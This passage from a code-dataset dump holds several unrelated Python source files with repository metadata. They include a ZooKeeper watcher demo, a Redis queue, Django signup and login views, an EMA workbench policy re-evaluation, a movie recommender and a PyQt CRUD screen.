KazooClient\nfrom kazoo.client import ChildrenWatch\nfrom kazoo.client import DataWatch\n\n\"\"\"\nWatcher可以通过两种方式设置,一种是在调用ZK客户端方法的时候传递进去,比如 zk.get_children(\"/node\", watch=FUN),但是这种方法是一次性的\n也就是触���一次就没了,如果你还想继续监听一个事件就需要再次注册。\n另外一种方法是通过高级API实现,监控数据或者节点变化,它只需要我们注册一次。一次性事件关注是zookeeper默认的即便在JAVA客户端里也是,这种高级别\nAPI在JAVA里是zkclient,而在Python里面就是kazoo。高级API其实是对低级API的封装,对用户来讲更加好用。\n\"\"\"\n\n__metaclass__ = type\n\n\nclass zkWatcherTest:\n\n def __init__(self, host, port, timeout=10):\n self._nodename = ''\n self._host = host\n self._port = port\n self._timeout = timeout\n self._zk = KazooClient(hosts=self._host + ':' + self._port, timeout=self._timeout)\n self._zk.start()\n 
self._lastNodeList = []\n\n def start(self, zkPath):\n self._lastNodeList = self._zk.get_children(zkPath)\n try:\n ChildrenWatch(client=self._zk, path=zkPath, func=self._NodeChange)\n\n DataWatch(client=self._zk, path=zkPath, func=self._DataChange)\n # 这里的死循环就是为了不让程序退出,你可以把时间设置长一点观察,其实即便没有到60秒的睡眠时间,如果\n # 子节点或者节点数量发生变化也会收到通知。这里的wathch底层就是在节点上设置监听器,然后捕捉事件,如果有\n # 事件触发就调用你传递的方法来处理。\n while True:\n time.sleep(60)\n print\n \"OK\"\n except Exception as err:\n print\n err.message\n\n def _NodeChange(self, children):\n \"\"\"\n 处理子节点变化\n :param children: 这个参数并不需要你传递进来,因为把这个方法传递进ChiledrenWatcher,会返回一个当前子节点列表\n :return:\n \"\"\"\n # print children\n # 如果新节点列表长度大于上次获取的节点列表长度,说明有增加\n if len(children) > len(self._lastNodeList):\n for node in children:\n if node not in self._lastNodeList:\n print\n \"新增加的节点为:\", str(node)\n self._lastNodeList = children\n else:\n for node in self._lastNodeList:\n if node not in children:\n print\n \"删除的节点为:\", str(node)\n self._lastNodeList = children\n\n def _DataChange(self, data, stat):\n \"\"\"\n 处理节点的数据变化\n :param data:\n :param stat:\n :return:\n \"\"\"\n print\n \"数据发生变化\"\n print\n \"数据为:\", data\n print\n \"数据长度:\", stat.dataLength\n print\n \"数据版本号version:\", stat.version\n print\n \"cversion:\", stat.cversion\n print\n \"子节点数量:\", stat.numChildren\n\n\ndef main():\n try:\n zkwt = zkWatcherTest(host=\"127.0.0.1\", port=\"2181\")\n zkwt.start(\"/zktest\")\n except Exception as err:\n print\n err.message\n\n\nif __name__ == \"__main__\":\n try:\n main()\n finally:\n sys.exit()","repo_name":"youngzil/quickstart-python","sub_path":"src/zookeeper/example/zkWatcherTest.py","file_name":"zkWatcherTest.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"18567817408","text":"from collections import deque\n\n\nclass Solution:\n def largestRectangleArea(self, heights) -> int:\n n = len(heights)\n\n def leftsmaller(nums):\n stack = deque()\n res = []\n for i, val in enumerate(nums):\n while stack and val <= stack[-1][1]:\n stack.pop()\n if not stack:\n res.append(-1)\n else:\n res.append(stack[-1][0])\n stack.append((i, val))\n return res\n\n def rightsmaller(nums):\n stack = deque()\n res = []\n for i in range(len(nums)-1, -1, -1):\n while stack and nums[i] <= stack[-1][1]:\n stack.pop()\n if not stack:\n res.append(n)\n else:\n res.append(stack[-1][0])\n stack.append((i, nums[i]))\n return res[::-1]\n\n l, r = leftsmaller(heights), rightsmaller(heights)\n res = 0\n for i in range(n):\n res = max(res, (r[i]-l[i]-1)*heights[i])\n return res\n","repo_name":"richiabhi/PlacementPreparationModule","sub_path":"Day14/largestHistogram.py","file_name":"largestHistogram.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5656689056","text":"#-*- coding: utf-8 -*-\n#\n# A cross-platform Mssage queue based redis\n#\nfrom gevent import monkey\nmonkey.patch_all()\nimport redis\nimport Config as cfg\n\n\nclass MessageQueue:\n def __init__(self, db=0, priority='p5'):\n self._queue = redis.StrictRedis(host=cfg.REDIS_ADDR,\n port=cfg.REDIS_PORT,\n db=0)\n self._priority = priority\n\n def get_priority(self) -> str:\n return self._priority\n\n def put(self, value):\n if not isinstance(value, str):\n raise RuntimeError(\"Must be a str type to put the queue of redis\")\n self._queue.lpush(self._priority, value)\n\n def get(self, block=True, encoding='utf-8'):\n if block:\n v = 
self._queue.brpop(self._priority)\n else:\n v = self._queue.rpop(self._priority)\n\n if v is None:\n return None\n else:\n _, v = v\n if encoding:\n v = str(v, encoding=encoding)\n return v\n\n def clear(self, priority='p5'):\n self._queue.delete(priority)\n\n\n# In[]\nif __name__ == '__main__':\n mq = MessageQueue()\n mq.clear()\n mq.put('12')\n mq.put('14')\n mq.put('16')\n v = mq.get(block=True)\n print(v)\n","repo_name":"yulincoder/Controller-Device","sub_path":"device-connection/communication.py","file_name":"communication.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"39483689144","text":"import Tkinter as tk\nimport cv2\nimport numpy\n\nclass GUI(tk.Tk):\n def __init__(self):\n tk.Tk.__init__(self)\n\n bF = tk.Frame(self, bd=8, relief='sunken')\n bF.pack(expand='true', fill='x')\n Button1 = tk.Button(bF, text='Basic', bd=4, fg='white',relief='groove', activebackground='green',command=self.basic)\n Button1.pack()\n Button2 = tk.Button(bF, text='Email', bd=4, fg='white',relief='groove', activebackground='green',command=self.Email)\n Button2.pack()\n Button3 = tk.Button(bF, text='parking', bd=4, fg='white',relief='groove', activebackground='green',command=self.SMS)\n Button3.pack() \n\n def basic(self):\n execfile('/home/pi/project/project1.py')\n key = cv2.waitKey(10)\n if key == 27:\n cv2.destroyAllWindows\n\n def Email(self):\n execfile('/home/pi/project/project2.py') \n key = cv2.waitKey(10)\n if key == 27:\n cv2.destroyAllWindows\n def SMS(self):\n \n execfile('/home/pi/project/project4.py')\n key = cv2.waitKey(10)\n if key == 27:\n cv2.destroyAllWindows\n \ngui = GUI()\ngui.mainloop()\n","repo_name":"Tesseract-coder/Kunal-Work","sub_path":"gui1.py","file_name":"gui1.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1039648296","text":"\ndef binary_Search(arr, target):\n low = 0\n high = len(arr) - 1\n mid = 0\n while (low <= high):\n mid = (high + low) // 2\n if target == arr[mid]:\n return mid\n elif target < arr[mid]:\n high = mid - 1\n elif target > arr[mid]:\n low = mid + 1\n else:\n return mid\n return -1\n\narr = [1,1,3,4,5]\n\nx = 5\nkq = binary_Search(arr, x)\n\nif kq == -1:\n print('khong tim thay') \nelse:\n print('O vi tri: ', str(kq))","repo_name":"CongSon01/Data-Structures-and-Algrorithms","sub_path":"Algorithms/Search/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35417011873","text":"# Diccionario de datos del usuari\r\n# Importar las librerias/Bibliotecas\r\nimport datetime\r\nfrom pathlib import Path\r\nimport UtilidadesSystem as util\r\nimport EstadoSystemCreate as estados\r\nimport PeliculaTipoSystemCreate as peliTipo\r\nimport GeneroPelSystemCreate as genPel\r\nimport CalificacionPelSystemCreate as calif\r\nimport ActoresSystemCreate as actores\r\nimport DirectorSystemCreate as directores\r\nimport ProductoraSystemCreate as productora\r\n\r\nfl_ruta_file = Path(\"C:/System_VideoClub/Peliculas.txt\")\r\n\r\n# Estructura de diccionario\r\nDcc_PeliSystem = {\r\n \"Id_Pelicula\": \"\",\r\n \"Nombre\": \"\",\r\n \"Id_PeliTipo\": \"\",\r\n \"Id_PelGenero\": \"\",\r\n \"Id_PelClasifica\": \"\",\r\n \"Id_Actor\": \"\",\r\n \"Id_Director\": \"\",\r\n \"Id_Productora\": \"\",\r\n \"Id_Estado\": \"\",\r\n 
\"Fecha_Ingreso\": \"\"\r\n}\r\n\r\n\r\n# ***********************************\r\n# Arranca el sistema\r\n# Pedimos al usuario del sistema ingresar los datos del nueva\r\n# pelicula del sistema.\r\ndef registrarDatos():\r\n print(\"Ingrese los datos del nueva pelicula: \")\r\n for clave in Dcc_PeliSystem:\r\n if format(clave) == \"Id_Pelicula\":\r\n print(f\"{clave}:___\")\r\n valor = \"\"\r\n elif format(clave) == \"Id_PeliTipo\":\r\n dcc_peliTipo = util.recuperarDatos(peliTipo.fl_ruta_file)\r\n valor = util.obtenerValor(dcc_peliTipo, \"Id_PeliTipo\")\r\n elif format(clave) == \"Id_PelGenero\":\r\n dcc_pelGenero = util.recuperarDatos(genPel.fl_ruta_file)\r\n valor = util.obtenerValor(dcc_pelGenero, \"Id_PelGenero\")\r\n elif format(clave) == \"Id_PelClasifica\":\r\n dcc_calif = util.recuperarDatos(calif.fl_ruta_file)\r\n valor = util.obtenerValor(dcc_calif, \"Id_PelClasifica\")\r\n elif format(clave) == \"Id_Actor\":\r\n dcc_actor = util.recuperarDatos(actores.fl_ruta_file)\r\n valor = util.obtenerValor(dcc_actor, \"Id_Actor\", \"Nombres_Apellidos\")\r\n elif format(clave) == \"Id_Director\":\r\n dcc_director = util.recuperarDatos(directores.fl_ruta_file)\r\n valor = util.obtenerValor(dcc_director, \"Id_Director\")\r\n elif format(clave) == \"Id_Productora\":\r\n dcc_productora = util.recuperarDatos(productora.fl_ruta_file)\r\n valor = util.obtenerValor(dcc_productora, \"Id_Productora\")\r\n elif format(clave) == \"Id_Estado\":\r\n dcc_estados = util.recuperarDatos(estados.fl_ruta_file)\r\n valor = util.obtenerValor(dcc_estados, \"Id_Estado\", \"Nombre\")\r\n elif format(clave) == \"Fecha_Ingreso\":\r\n valor = datetime.datetime.now()\r\n else:\r\n valor = input(\"{}: \".format(clave))\r\n Dcc_PeliSystem[clave] = valor\r\n\r\n while True:\r\n Lv_Guardar = str(input(\"Desea guardar los datos de la pelicula (S/N): \")).upper()\r\n if Lv_Guardar == \"S\":\r\n print(\"Procesando...\")\r\n # Proceso de almacenamiento\r\n # Recuperamos la secuencia de los registros guardados\r\n Ln_SenccReg = util.Prc_ContrSecuencia(\"PeliculaSystem\")\r\n # Salvo el registro dentro del file del archivo\r\n with open(fl_ruta_file, \"a\") as archivoUser:\r\n Linea = \"Pelicula\" + str(Ln_SenccReg) + \":\"\r\n for clave, valor in Dcc_PeliSystem.items():\r\n if format(clave) == \"Id_Pelicula\":\r\n valor = str(Ln_SenccReg)\r\n Linea += f\"{clave}={valor},\"\r\n Linea = Linea.rstrip(\",\") + \"\\n\"\r\n archivoUser.write(Linea)\r\n # Actualizar la secuencia de los registros\r\n Lv_Guardar = util.Prc_UpdateSecuencia(\"PeliculaSystem\", Ln_SenccReg)\r\n if Lv_Guardar == \"SI\":\r\n print(\"La secuencia de los registros de peliculas fue actualizada\")\r\n else:\r\n print(\"La secuencia no fue actualizada, notifique a sistema.\")\r\n break\r\n elif Lv_Guardar == \"N\":\r\n # Cancelamos el proceso de crear un nuevo usuario\r\n print(\"Proceso cancelado.\")\r\n break\r\n else:\r\n print(\"Opción no valida.\")","repo_name":"aterana3/Proyecto-3er-semestre","sub_path":"PeliculaSystemCreate.py","file_name":"PeliculaSystemCreate.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"13820981623","text":"from datetime import date\nimport re\n\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel\n\nclass Transaction(BaseModel):\n date: date\n description: str\n amount: str\n\n\nclass Merchant(BaseModel):\n name: str\n\n\napp = FastAPI()\n\ndef normalize_merchant_heuristic(tx: Transaction) -> Merchant:\n \"\"\"\n Please do 
not focus on the implementation of this heuristic.\n For the purpose of the exercise, we will assume that the heuristic is already\n implemented with the code below. We are looping over the regex on purpose to\n reflect the slowness of a real-world implementation.\n \"\"\"\n match = None\n for _ in range(20_000_000):\n match = re.search(\"Netflix\", tx.description)\n\n if match:\n return Merchant(name=\"Netflix\")\n else:\n return Merchant(name=\"n/a\")\n\n\n@app.post(\"/normalize_merchant\")\nasync def normalize_merchant(tx: Transaction):\n merchant = normalize_merchant_heuristic(tx)\n return merchant\n","repo_name":"HarithJ/fastapi-async-tasks","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29408135518","text":"from django.shortcuts import render\nfrom django.shortcuts import redirect\nfrom django.contrib.auth.models import User\nfrom django.contrib import messages\nfrom django.contrib.messages import constants\nfrom django.contrib import auth\n\nimport re\n\n# libs send email\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.template.loader import render_to_string\nfrom django.utils.html import strip_tags\nfrom django.conf import settings\n\n\ndef cadastro(request):\n if request.method == 'GET':\n if request.user.is_authenticated:\n return redirect('/')\n return render(request, 'cadastro.html')\n elif request.method == 'POST':\n username = request.POST.get('username')\n email = request.POST.get('email')\n senha = request.POST.get('senha')\n confirmar_senha = request.POST.get('confirmar_senha')\n \n #captcha\n captcha = request.POST.get('captcha')\n re_captcha = request.POST.get('re_captcha')\n \n if len(username.strip()) == 0 or len(email.strip()) == 0 or len(senha.strip()) == 0:\n messages.add_message(request, constants.ERROR,\n 'Preencha todos os campos')\n return redirect('/auth/cadastro')\n elif re.findall(username.lower(), senha.lower()):\n messages.add_message(request, constants.ERROR,\n 'Senha não pode ser igual ao usuario')\n return redirect('/auth/cadastro')\n \n elif re.findall('123', senha) or re.findall('234', senha) or re.findall('345', senha) or re.findall('456', senha) or re.findall('567', senha) or re.findall('678', senha) or re.findall('789', senha):\n messages.add_message(request, constants.ERROR,\n 'Senha não pode ter uma sequencia numérica')\n return redirect('/auth/cadastro')\n \n elif senha != confirmar_senha:\n messages.add_message(request, constants.ERROR,\n 'As senhas digitadas não são iguais!')\n return redirect('/auth/cadastro')\n \n elif len(senha.strip()) <= 5:\n messages.add_message(request, constants.ERROR,\n 'A senha tem que ter no minimo 6 caracteres e ao menos um caracter especial')\n return redirect('/auth/cadastro')\n \n elif re.search('[,.;@/]', senha.strip()) == None:\n messages.add_message(request, constants.ERROR,\n 'A senha tem que ter no minimo 6 caracteres e ao menos um caracter especial (@ / . 
, ;)')\n return redirect('/auth/cadastro')\n \n elif captcha != re_captcha:\n messages.add_message(request, constants.ERROR,\n 'Erro de CAPTCHA!')\n return redirect('/auth/cadastro')\n \n elif len(captcha.strip()) == 0 and len(re_captcha.strip()) == 0:\n messages.add_message(request, constants.ERROR,\n 'Erro de CAPTCHA!')\n return redirect('/auth/cadastro')\n \n user = User.objects.filter(username=username)\n email_filter = User.objects.filter(email=email)\n \n if user.exists():\n messages.add_message(request, constants.ERROR,\n 'Já existe um usuario com esse nome cadastrado')\n return redirect('/auth/cadastro')\n \n #deu certo\n if email_filter.exists():\n messages.add_message(request, constants.ERROR,\n 'Esse email já foi cadastrado')\n return redirect('/auth/cadastro')\n \n try:\n user = User.objects.create_user(username=username,\n email=email,\n password=senha)\n user.save()\n\n messages.add_message(request, constants.SUCCESS,\n 'Usuário cadastrado com sucesso!')\n\n # Send E-mail\n html_content = render_to_string('emails/cadastro_confirmado.html')\n text_content = strip_tags(html_content)\n\n email_send = EmailMultiAlternatives(\n 'Cadastro Confirmado', text_content, settings.EMAIL_HOST_USER, [email])\n email_send.attach_alternative(html_content, 'text/html')\n email_send.send()\n\n return redirect('/auth/logar')\n except:\n messages.add_message(request, constants.ERROR,\n 'Erro interno do sistema')\n return redirect('/auth/cadastro')\n\n\ndef logar(request):\n if request.method == 'GET':\n if request.user.is_authenticated:\n return redirect('/home.html')\n return render(request, 'logar.html')\n elif request.method == 'POST':\n username = request.POST.get('username')\n senha = request.POST.get('senha')\n\n usuario = auth.authenticate(username=username, password=senha)\n if not usuario:\n messages.add_message(request, constants.ERROR,\n 'Usuário ou senha inválidos')\n return redirect('/auth/logar')\n else:\n auth.login(request, usuario)\n \n # Send e-mail\n html_content = render_to_string('emails/promo_imovel.html')\n text_content = strip_tags(html_content)\n\n email_send = EmailMultiAlternatives(\n 'Bem vindo ao ImobiBR', text_content, settings.EMAIL_HOST_USER, [usuario.email])\n email_send.attach_alternative(html_content, 'text/html')\n email_send.send()\n return redirect('/home')\n\n\ndef sair(request):\n auth.logout(request)\n return redirect('/auth/logar')\n\n\ndef handler404(request, exception):\n return render(request, 'status_code/not_found.html')\n\n\ndef handler500(request):\n return render(request, 'status_code/server_error.html')","repo_name":"satoosan/ImobiBR","sub_path":"imobi/autenticacao/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5990,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"25862763856","text":"import logging\n__version__ = '1.2.7'\n\ngearauthsite = \"ga.netpie.io\"\ngearapiport = '8080';\ngearapisecureport = '8081';\ngbport = '1883';\ngbsport = '8883';\n\nmgrev = \"PY11k\"\ngearkey = None\ngearsecret = None\ngearalias = None\nappid = None\ngearname = None\naccesstoken = None\nrequesttoken = None\nclient = None\nscope = \"\"\ngearexaddress = None\ngearexport = None\nmqtt_client = None\nlogger = logging.getLogger(\"python-microgear\")\nsecuremode = False\nstate = 
False\n","repo_name":"netpie2015/microgear-python","sub_path":"microgear/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"44"} +{"seq_id":"21725196841","text":"\n\nimport sys \nimport matplotlib.pyplot as plt\nimport pandas as pd \n\nfile_path = r'C:\\Users\\sasad\\Desktop\\github\\nz_gov_data\\liabilities_equities_assets'\nsys.path.append(file_path)\n\nfrom total_assets import lowest_api \n\ndef display_highest_total_assets(lpi: pd.Series) -> None:\n \n industry = lpi.index.tolist()\n assets = lpi.values.tolist()\n\n shorten_names = [\n 'Public Order, Safety',\n 'Education and Training',\n 'Healthcare',\n 'Media and Telecommunications',\n 'Arts, Recreation'\n ]\n\n industry[:] = [x for x in shorten_names]\n\n line_color = '#D83A56'\n color = '#0E185F'\n bg_color = '#C9EEFF'\n text_color = '#FF5677'\n\n fig, ax = plt.subplots()\n plt.bar(industry, assets, color = color)\n\n fig.patch.set_facecolor(bg_color)\n ax.set_facecolor(bg_color)\n\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['bottom'].set_color(color)\n ax.spines['left'].set_color(color)\n\n plt.suptitle(\n 'NEW ZEALAND LOWEST TOTAL ASSETS PER INDUSTRY 2013-2021',\n fontfamily = 'Bahnschrift',\n fontsize = 18,\n color = text_color\n )\n\n plt.title(\n '*source https://www.data.govt.nz/',\n fontfamily = 'Bahnschrift',\n color = text_color\n )\n\n plt.ylabel(\n 'ASSETS (in millions of NZ Dollars)',\n fontfamily = 'Bahnschrift',\n fontsize = 12.5,\n color = text_color\n )\n\n plt.xlabel(\n 'INDUSTRY NAME',\n fontfamily = 'Bahnschrift',\n fontsize = 12.5,\n color = text_color\n )\n\n plt.xticks(color=color)\n plt.yticks(color=color)\n\n for index, value in enumerate(assets):\n plt.text(\n index,\n value, \n str(value),\n ha = 'center',\n position = (index, value-7_500),\n fontweight = 'bold',\n color = 'w',\n fontsize = 15\n )\n\n plt.show()\n\ndisplay_highest_total_assets(lowest_api)\n\n","repo_name":"sasadjukic/nz_gov_data","sub_path":"liabilities_equities_assets/assets_charts/lowest_total_assets_per_industry.py","file_name":"lowest_total_assets_per_industry.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19485403486","text":"from __future__ import absolute_import\n\nimport tensorflow as tf\nfrom . import lib\nfrom . 
import utils\nimport numpy as np\n\ndef _load_graph(model_file):\n graph = tf.Graph()\n graph_def = tf.compat.v1.GraphDef()\n with open(model_file, \"rb\") as f:\n graph_def.ParseFromString(f.read())\n with graph.as_default():\n tf.import_graph_def(graph_def)\n return graph\n\nclass NazoruPredictor():\n def __init__(self, model_file):\n graph = _load_graph(model_file)\n self._graph = graph\n self._input_operation = graph.get_operation_by_name(\n 'import/' + lib.INPUT_NODE_NAME)\n self._output_operation = graph.get_operation_by_name(\n 'import/' + lib.OUTPUT_NODE_NAME)\n\n def _predict(self, data):\n with utils.Measure('inputs'):\n inputs = lib.keydowns2image(data, True, True, 16, 2)\n inputs = np.expand_dims(inputs, axis=0)\n with utils.Measure('sess.run'):\n with tf.compat.v1.Session(graph=self._graph) as sess:\n result = sess.run(self._output_operation.outputs[0],\n {self._input_operation.outputs[0]: inputs})[0]\n return result\n def predict_top_n(self, data, n):\n \"\"\"Predict the charactor drawn by |data|.\n\n Args:\n data: [(key, time)] |time| is elapsed time since the first character in ms.\n n: integer of the number of the return value.\n Returns:\n ans: [(kana, key, probability)] sorted by the probability.\n \"\"\"\n result = self._predict(data)\n ans = []\n for i in result.argsort()[::-1][:n]:\n ans.append((lib.KANAS[i], lib.KEYS[i], result[i]))\n return ans\n","repo_name":"google/mozc-devices","sub_path":"mozc-nazoru/src/nazoru/predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":1830,"dataset":"github-code","pt":"44"} +{"seq_id":"8747305290","text":"# %%\n\n# Re-evalute the policies after the optimization of the worst-case scenarios\n\n'''\n After having optimized based on the worst-case scenarios we continue with the re-evaluation of the policies.\n'''\nif __name__ == '__main__':\n import pandas as pd\n\n# read the results of the optimization(step5)\nresults = []\nfor i in range(3):\n read_results= pd.read_csv(\"intermediate outputs/step5 - multi scenario optimization results/step5 - \" + str(i) + \" optimization results.csv\")\n results.append(read_results)\n\n\n# concatenate the results in a Dataframe\ntpm = pd.concat([results[0], results[1]])\ntpm = pd.concat([tpm, results[2]])\ntpm\n\n\n# %%\nimport numpy as np\n\nlogical = (tpm['A.4_Expected Number of Deaths'] < 0.01) & (tpm['A.5_Expected Number of Deaths'] < 0.01) & (tpm['Other.Dikes_Expected Number of Deaths'] < 0.01)\nres = np.sum(logical) / len(tpm)\nprint(res * 100)\nprint(np.sum(logical))\n\n\n# %%\nselected = tpm[logical]\n\n\n# %%\nselected['Dike 4 & 5 - Total deaths'] = selected[\"A.4_Expected Number of Deaths\"] + selected[\"A.5_Expected Number of Deaths\"]\n\n\n# %%\nfor q in [25, 50, 75]:\n logical = selected['Dike 4 & 5 - Total deaths'] < np.percentile(selected['Dike 4 & 5 - Total deaths'], q)\n print(f'Policies kept: {np.sum(logical)}')\n print(f'% Policies kept: {np.sum(logical)/len(results) * 100}')\n print()\n\n\n# %%\nlogical = selected['Dike 4 & 5 - Total deaths'] < np.percentile(selected['Dike 4 & 5 - Total deaths'], q)\n\n\n# %%\nperc = np.percentile(selected['Dike 4 & 5 - Total deaths'], 25)\n\n\n# %%\nperc\n\n\n# %%\ncount = 0\nfor result in results:\n result['Dike 4 & 5 - Total deaths'] = result[\"A.4_Expected Number of Deaths\"] + result[\"A.5_Expected Number of Deaths\"]\n logical = (result['Dike 4 & 5 - Total deaths'] < perc) & (result['Other.Dikes_Expected Number of Deaths'] < 0.01)\n count += 
np.sum(logical)\nprint(count)\n\n\n# %%\nfinal_results=[]\nfor result in results:\n result['Dike 4 & 5 - Total deaths'] = result[\"A.4_Expected Number of Deaths\"] + result[\"A.5_Expected Number of Deaths\"]\n logical = (result['Dike 4 & 5 - Total deaths'] < perc) & (result['Other.Dikes_Expected Number of Deaths'] < 0.01)\n final_results.append(result[logical])\n\n\n# %%\nlen(final_results[0]) + len(final_results[2]) + len(final_results[1])\n\n\n# %%\nfrom ema_workbench import Policy, MultiprocessingEvaluator\nfrom problem_formulation import get_model_for_problem_formulation\n\n# create the dike_model\nproblem_formulation = 6 # WARNING: use the same PF as the ones that you used to create the results csv file!\ndike_model, planning_steps = get_model_for_problem_formulation(problem_formulation)\n\n\npolicies = []\nto_drop = []\n\nfor i, result in enumerate(final_results):\n for column in final_results[i].columns: #we keep only the levers\n to_drop.append(column)\n for o in dike_model.levers:\n to_drop.remove(o.name)\n\n result = result.drop([column for column in to_drop], axis=1);\n for j, row in result.iterrows():\n policy = Policy(f'scenario {i} option {j}', **row.to_dict())\n policies.append(policy)\n\n\n# %%\nlen(policies)\n\n\n# %%\nimport time, pickle\n#run the experiments\nstart_time = time.time()\nprint('Runtime started')\n\nfrom ema_workbench import ema_logging\nema_logging.log_to_stderr(ema_logging.INFO)\n\nwith MultiprocessingEvaluator(dike_model) as evaluator:\n experiments,outcomes = evaluator.perform_experiments(100, policies=policies)\n\nend_time = time.time()\nprint('Runtime ended with duration of', str(end_time - start_time))\n\n\n#save the results\nexperiments.to_csv(\"intermediate outputs/step6 - second re-evaluation - experiments description.csv\")\n\n# save the outcomes to a pickle file (outcomes is a dictionary)\na_file = open(\"intermediate outputs/step6 - second re-evaluation - outcomes description.pkl\", \"wb\")\npickle.dump(outcomes, a_file)\na_file.close()\n# to read back our dictionary: https://www.adamsmith.haus/python/answers/how-to-save-a-dictionary-to-a-file-in-python\n\n\n","repo_name":"LudovicaBindi/MBDM-Final_Project","sub_path":".ipynb_checkpoints/final_step6_second_reevaluate_policies-checkpoint.py","file_name":"final_step6_second_reevaluate_policies-checkpoint.py","file_ext":"py","file_size_in_byte":3953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42929390844","text":"import pandas as pd\nfrom sklearn.metrics.pairwise import linear_kernel\n# from gensim.models import\nfrom scipy.io import mmread, mmwrite\nimport pickle\n\ndf_review_1stcs = pd.read_csv('./crawling/one_sentences_review_2018~2021.csv', index_col=0)\n# print(df_review_1stcs.info())\n# print(df_review_1stcs.head())\n\n\n' enumerate'\nls = '겨울왕국 라이온킹 알라딘'.split()\nprint(list(enumerate(ls)))\n\n\nexit()\n# TF-IDF matrix load / TF-IDF load\ntfidf_matrix = mmread('./models/tfidf_movie_review.mtx').tocsr()\nwith open('./models/tfidf.pickle', 'rb') as f:\n tfidf = pickle.load(f)\n\n\n\ndef getRcommendation(cosine_sim):\n simScore = list(enumerate(cosine_sim[-1]))\n simScore = sorted(simScore, key=lambda x : x[1], reverse=True)\n simScore = simScore[1:10] # 0은 self\n movieidx = [i[0] for i in simScore]\n recMovieList = df_review_1stcs.iloc[movieidx, 0] # row indexing\n return recMovieList\n\n\n\n# 영화의 index 탐색\nmovie_idx = df_review_1stcs[df_review_1stcs['titles']=='기생충 (PARASITE)'].index[0]\n\n# 또는 index를 직접 지정해서 사용 가능\n# movie_idx 
= 300\n# 영화 제목 확인\nprint(df_review_1stcs.iloc[movie_idx, 0])\n\ncosine_sim = linear_kernel(tfidf_matrix[movie_idx], tfidf_matrix)\nrecommendation = getRcommendation(cosine_sim)\nprint(recommendation)","repo_name":"forhow/Movie4U","sub_path":"PRJ02_movie4you/movie_rcmd_sys.py","file_name":"movie_rcmd_sys.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1281578997","text":"def is_leap_year(year):\n if year%1000 == 0:\n return True\n elif year%100 == 0:\n return False\n elif year%4 == 0:\n return True\n else:\n return False\n\ncurrent_year = int(input(\"Enter current year: \"))\nfinal_year = int(input(\"Enter final year: \"))\n\nfor year in range(current_year, final_year+1):\n if is_leap_year(year):\n print(year)\n","repo_name":"pranavkaruvally/programming-lab","sub_path":"cycle1/leap_year.py","file_name":"leap_year.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"6596405502","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom src.views.update_page import UpdatePage\nfrom src.views.read_page import ReadPage\nfrom src.views.delete_page import DeletePage\nfrom src.views.create_page import CreatePage\n\n\nclass CRUDScreen(QtWidgets.QWidget):\n def __init__(self, parent=None, controller=None):\n super(CRUDScreen, self).__init__(parent)\n self.controller = controller\n self.setup_ui()\n\n def setup_ui(self):\n self.setObjectName(\"self\")\n self.resize(685, 475)\n font = QtGui.QFont()\n font.setFamily(\"Times New Roman\")\n font.setPointSize(12)\n self.setFont(font)\n self.verticalLayout_3 = QtWidgets.QVBoxLayout(self)\n self.verticalLayout_3.setObjectName(\"verticalLayout_3\")\n self.verticalLayout_2 = QtWidgets.QVBoxLayout()\n self.verticalLayout_2.setObjectName(\"verticalLayout_2\")\n self.verticalLayout = QtWidgets.QVBoxLayout()\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.horizontalLayout = QtWidgets.QHBoxLayout()\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\n spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n self.horizontalLayout.addItem(spacerItem)\n self.label = QtWidgets.QLabel(self)\n self.label.setMinimumSize(QtCore.QSize(100, 0))\n self.label.setObjectName(\"label\")\n self.horizontalLayout.addWidget(self.label)\n self.current_table_box = QtWidgets.QComboBox(self)\n self.current_table_box.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.current_table_box.setMinimumSize(QtCore.QSize(150, 0))\n self.current_table_box.setObjectName(\"current_table_box\")\n self.horizontalLayout.addWidget(self.current_table_box)\n self.verticalLayout.addLayout(self.horizontalLayout)\n self.CRUDPages = QtWidgets.QTabWidget(self)\n self.CRUDPages.setObjectName(\"CRUDPages\")\n self.create_page = CreatePage(self)\n 